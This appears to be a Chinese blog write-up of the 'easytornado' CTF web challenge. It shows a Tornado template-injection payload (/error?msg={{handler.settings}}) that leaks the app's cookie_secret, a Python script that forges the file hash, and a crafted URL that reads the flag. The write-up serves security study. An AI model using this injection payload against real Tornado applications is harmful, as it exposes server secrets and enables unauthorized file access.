攻防世界:easytornado

最新推荐文章于 2024-04-07 18:42:38 发布
最新推荐文章于 2024-04-07 18:42:38 发布
阅读量500 收藏 3
点赞数 1
分类专栏: CTF_Web_Writeup 攻防世界XCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46230755/article/details/112341033
版权

题目点开存在三个文件
在这里插入图片描述
/flag.txt提醒我们flag存在的位置flag in /fllllllllllllag
/welcome.txt提醒render,render({options}) 猜测存在模板注入
/hints.txt提醒md5(cookie_secret+md5(filename))
即先将filenamemd5加密,再将cookie_secret与md5加密后的filename进行md5加密,目前我们需要知道的是filenamecookie_secret,猜测文件名为/fllllllllllag,也就是说,只要知道cookie_secret就行了。
访问文件的url中
在这里插入图片描述
要通过filehash进行访问
尝试访问/fllllllllllag,发现存在错误页面
在这里插入图片描述
页面存在msg,尝试
在这里插入图片描述
证实存在模板注入漏洞
通过查阅文档发现cookie_secret在Application对象settings属性中,还发现self.application.settings有一个别名:
handler指向的处理当前这个页面的RequestHandler对象,
RequestHandler.settings指向self.application.settings,
因此handler.settings指向RequestHandler.application.settings。
构造payload:

/error?msg={{handler.settings}}

得到cookie_secret
在这里插入图片描述

5e454feb-3c1e-4920-ab21-fac30bd8bfc6

利用脚本构造
可利用在线网站进行编译
python在线网站

import hashlib

def md5(s):
 md5 = hashlib.md5() 
 md5.update(s) 
 return md5.hexdigest()
 
def filehash():
 filename = '/fllllllllllllag'
 cookie_secret = '5e454feb-3c1e-4920-ab21-fac30bd8bfc6'
 print(md5(cookie_secret+md5(filename)))
 
if __name__ == '__main__':
 filehash()

构造payload

/file?filename=/fllllllllllllag&filehash=519e1f4f0e635af43559dca0f6c6f686

得到flag
在这里插入图片描述

Flag

flag{3f39aea39db345769397ae895edb9c70}
FW_ENJOEY
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
攻防世界】十六 --- easytornado --- python Tornado框架
qq_43168364的博客
12-28 358
题目 — easytornado 一、writeup 主页有三个文件 分别访问以下可以看到他们的URL格式如下图所示 都是文件名带一个filehash的格式,那就可以猜测访问flag文件的url格式应该就是:/file?filename=/flag的文件名&filehash=xxx。接下来依次看这几个文件的内容。/flag.txt文件 提示flag在:/fllllllllllllag中,我们的URL格式又进一步确定了:/file?filename=/fllllllllllllag&fi
攻防世界:适合作为桌面
10-08
攻防世界:适合作为桌面,misc 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127215689
攻防世界 easytornado
weixin_52268949的博客
02-23 2058
easytornado 进入环境就这样子 我们逐一访问看看 进入flag.txt提示flag in /fllllllllllllag我们访问fllllllllllllag看看 报了一个error,且在浏览器有回显,莫非是模板注入,我们试一试,把error换成456看看浏览器回显 确定有模板注入了但是这里没有更多信息我们只能先放一放了 然后我们去访问welcome.txt看看 第二个是一个render,render是一个Tomado框架的一个渲染函数,即可以通过传递不同的参数形成不同的页面。 还有个
攻防世界-easytornado
Mirror_iu的博客
01-22 140
闲着无聊在攻防世界刷点 Web 题,刚好我也快刷完了。这些零碎的刷题又不想开博客记录,但是每周复现还是要看看,所以就来 csdn记录吧
easytornado-攻防世界
szhangliwenya的博客
04-07 499
handler指向处理当前这个页面的RequestHandler对象, RequestHandler.setting指向self.application.settings,因此构造payload。tornado render是python中的一个渲染函数,也就是一种模板,通过调用的参数不同,生成不同的网页,如果用户对render内容可控,不仅可以注入。查询到可以使用{{handler.settings}}获取服务器的配置文件信息。代码,而且还可以通过{{}}进行传递变量和执行简单的表达式。
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
攻防世界:阳间题的实战解析与策略.zip
最新发布
05-13
总之,攻防世界竞赛是一个充满挑战和机遇的舞台。只要你热爱网络安全、愿意付出努力和时间、不断学习和实践,你一定能够在这个舞台上展现出自己的才华和实力。
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界 easytornado 详解
xmj818719的博客
03-28 841
Tornado框架 第一任务先找cookie_secret 没什么头绪,直接访问http://111.200.241.244:59809/file?filename=/fllllllllllllag&filehash=7bc08cbde1fe13f5898f51b5470dc21d 回想起前段时间做的py模板注入,用同样的方法试一下 还是无果 最后动用谷歌寻找框架漏洞 网上搜罗框架漏洞资料,资料大概意思是可用 handler.settings 访问配置文件 http...
攻防世界-web-easytornado
wuh2333的博客
07-19 1474
攻防世界,模板注入
攻防世界easytornado-tornado模板注入
yuanxu8877的博客
11-28 355
攻防世界easytornado-tornado模板注入
攻防世界】十五、easytornado
Hi~ 土拨鼠
09-17 224
步骤 打开所给场景,发现给出了三个文件: 依次进行访问: flag.txt welcome.txt hints.txt 获得的信息:url是统一的,只有传递的参数在变化,flag在/fllllllllllllag中,也就是filename=/fllllllllllllag,filehash也给出了我们计算方法,render是python中一个渲染函数,渲染变量到模板中,即可以通过传递不同的参数形成不同的页面 所以现在我们只有拿到cookie_secret就行了 尝试访问(filehash暂时不知道.
攻防世界 web进阶区 easytornado
m0_51395584的博客
06-17 411
攻防世界 web进阶区 easytornado Tornado 框架的漏洞利用
攻防世界web进阶区之easytornado
qq_45756971的博客
07-22 317
点开题目所给链接: 会发现有三个链接,查看其他页面: /flag.txt:/welcome.txt:/hints.txt:我们通过第一个页面会发现flag藏于fllllllllllllag之中,所以我们直接输入/fllllllllllllag尝试,跳转页面会报错:此时我们通过error?msg={{ handler.settings }}传递得到cookie secret: 0df815ab-9f5c-4d1a-aa18-b8d0ebaa5edc,/fllllllllllllag的MD5为 3bf9f6cf
攻防世界web进阶区easytornado
gongjingege的博客
07-28 449
题目有描述提示,tornado框架 打开链接 发现3个文件 1,flag in /fllllllllllllag 2,render,可能会是SSTI模板注入 3,md5(cookie_secret+md5(filename)) url中输入/fllllllllllllag,直接error 用handler.settings对象拿到cookie url注入**/error?msg={{handler.settings}}** 根据hint,filehash值由md5加密 先filename即/fl
XCTF攻防世界web进阶easytornado
qq_60787987的博客
04-02 3628
打开题目我们可以看到如下界面: 点开flag.txt看到 /flag.txt flag in /fllllllllllllag 提示我们flag所在的文件。 点开welcome.txt看到render,这里就涉及到本题目的核心知识,模板注入。这个等下再讲。 接下来,点开hints就看到 /hints.txt md5(cookie_secret+md5(filename)) 涉及到知识有 render是python中的一个渲染函数,也就是一种模板,通过调用的参数不同,生成不同的网页 ren
攻防世界traffic
07-28
- *1* *2* [xctf攻防世界 Web高手进阶区 easytornado](https://blog.csdn.net/l8947943/article/details/126174257)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值